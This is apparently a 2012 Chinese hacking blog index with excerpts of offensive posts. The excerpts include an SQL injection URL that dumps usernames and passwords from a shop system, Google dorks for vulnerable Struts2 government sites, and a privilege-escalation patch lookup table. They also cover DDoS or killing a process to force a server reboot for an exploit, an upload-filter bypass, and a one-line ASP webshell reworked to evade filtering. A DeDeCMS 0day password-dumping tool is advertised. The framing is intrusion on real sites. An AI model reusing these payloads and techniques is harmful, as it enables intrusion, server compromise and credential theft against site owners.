网趣网上购物系统旗舰版(免费版)SQL注入漏洞

   
分类:安全 | 2012-07-20 | 撸过 1,342 次
0人扯蛋

 

版本:网趣网上购物系统旗舰版(免费版)

下载:http://www.cnhww.com/down.asp?id=6

----------------------------------------------------------------------

第一处:

/research.asp

对selectname未进行任何过滤,造成搜索型注入

code:

7-12行

dim action,searchkey,anclassid,jiage,selectnameanclassid=request("anclassid")searchkey=request("s[......]

继续阅读

一些本地提权漏洞,对应的补丁序列号,提权的时候会用到

   
分类:安全 | 2012-07-17 | 撸过 2,514 次
0人扯蛋

一些本地提权漏洞,对应的补丁序列号,提权的时候会用到,先看看打没打补丁,再决定用哪个。

KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB944653 MS07-067
KB952004 MS09-012
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011
kb942831 MS08-005
KB2503665 MS1[......]

继续阅读

ASP 连接 MySQL 数据库两种方法

   
分类:安全 | 2012-07-17 | 撸过 2,590 次
0人扯蛋

一般都是用myodbc来连接。首先,在系统中安装 Mysql 的ODBC数据库驱动。如安装稳定版本是3.51.下载地址是:http://dev.mysql.com/downloads/connector/odbc/3.51.html。

下载安装好后。在控制面板-->管理工具-->数据源 (ODBC)中的“驱动程序”页中如果有MySQL ODBC 3.51 Driver就说明驱动已经安装成功,就可以开始写程序了。

下面是我测试时使用的程序,里面有说明就不再介绍了。

方法一:

<%
'设置MySql连接属性
'各个变量说明:
' myHost:MySql[......]

继续阅读

iis6 提权提示 Can not find wmiprvse.exe 的突破方法

   
分类:安全 | 2012-07-17 | 撸过 1,270 次
0人扯蛋

方法一:

在IIS环境下,如果权限做得不严格,我们在aspx大马里面是有权限直接结束wmiprvse.exe进程的。进程查看里面直接K掉

在结束之后,它会再次运行,这时候的PID值的不一样的。这时候我们回来去运行exp。直接秒杀。

方法二:

虚拟主机,一般权限严格限制的,是没权限结束的,这时候我们可以考虑配合其他溢出工具让服务器强制重启。

例如前段时间出的3389蓝屏exp(测试很多打了补丁也可以的)

甚至可以暴力点,DDOS秒杀之,管理发现服务器不通了首先肯定是以为服务器死机,等他重启下服务器(哪怕是IIS重启下)同样秒杀之。

方法三:

从exp源代码入手,让它在运行的过程中[......]

继续阅读

通杀wordpress 暴路径漏洞

   
分类:安全 | 2012-07-14 | 撸过 2,011 次
2人扯蛋

躺着也中枪啊…

缺陷文件:

http://www.webshell.cc/wp-includes/registration-functions.php

关键代码 :
—->

 
<?php
/**
* Deprecated. No longer needed.
*
* @package WordPress
*/
_deprecated_file( basename(__FILE__), ’2.1′, null, __( ‘This file no longer needs to be included.’ ) );
?>
—–>

测试:
===========[......]

继续阅读

Shopv8 商城系统 v12.07 Cookies 注入漏洞

   
分类:安全 | 2012-07-5 | 撸过 1,159 次
0人扯蛋

Shopv8 商城系统 v12.07,程序下载:http://www.mycodes.net/20/1099.htm 

漏洞文件:list.asp 

http://127.0.0.1/list.asp?id=338 

注入中转爆帐号密码 

http://127.0.0.1:808/jmCook.asp?jmdcw=338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,password,username,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,34,35,36,3[......]

继续阅读

某政府政务管理系统通用Struts2漏洞

   
分类:安全 | 2012-07-5 | 撸过 6,611 次
1人扯蛋

谷歌关键字:inurl:common/common_info.action?wid=
Inurl:index.action
Inurl:商城.achtion (商城比较多)
Inurl:index.achtion 标题:apache struts2
Inurl:action?id=
没有NB的关键字 只有爱想的脑袋
关键字不唯一可能你多想想就能想出更牛的关键字
就开始利用吧


Struts2这个漏洞很多大站都存在 比如这个香港电视台的
不过这个执行命令卡 我就换个搞过的吧 那样方便演示


一小站 http://www.laipin.com/这个漏洞一般都是阿帕奇 linux的
所以我们直接[......]

继续阅读

网站解压上传漏洞一种新突破

   
分类:安全 | 2012-07-5 | 撸过 912 次
0人扯蛋

本来是搞一个站,linux+php+Sybaser。进后台后有上传,正常的在上传图片哪我是想尽了各种办法也没有突破,不过该站还有一种上传,看图1
 

 
但是把c.php放在压缩包里后它还会给你自动变成c.php.txt。这时我们可以用到rar的特性了。正常情况下,我们是没有办法在win下把c.php改名成”c.php.”,但是在压缩包里我们是可以这样改名的。看图2
 


 
改成这个名字后上传,该站php程序解压后自动就解压成了正常的c.php。
 
这个方法的意义在于,如果是这种方式上传,win下当然会自动去掉最后一个点,从而绕过系统的过滤。但是这个站是linux的,所以不知是系统[......]

继续阅读

一句话木马新方法

   
分类:安全 | 2012-07-1 | 撸过 2,094 次
0人扯蛋

很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。

使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。

不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。

这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。

首先:原程序代码是“〈%execute request("l")%〉", 我们可以把它的标签换下来。

然后改成"〈scriptlanguage=VBScript runat=server〉execute request("l")〈/Script〉".。

这样就避开了使用[......]

继续阅读

DeDeCMS v5.7最新利用工具[一键暴密码]0day

   
分类:安全 | 2012-07-1 | 撸过 5,594 次
3人扯蛋
文章图片

使用说明:

1、输入被检测网站的地址

2、请等待,时间取决于你的网络状况,和网站的速度。

3、如果网站没有漏洞的话会弹出提示。

4、成功的话会弹出一个窗口复制密码去破解就好了。

下载地址:DeDeCMS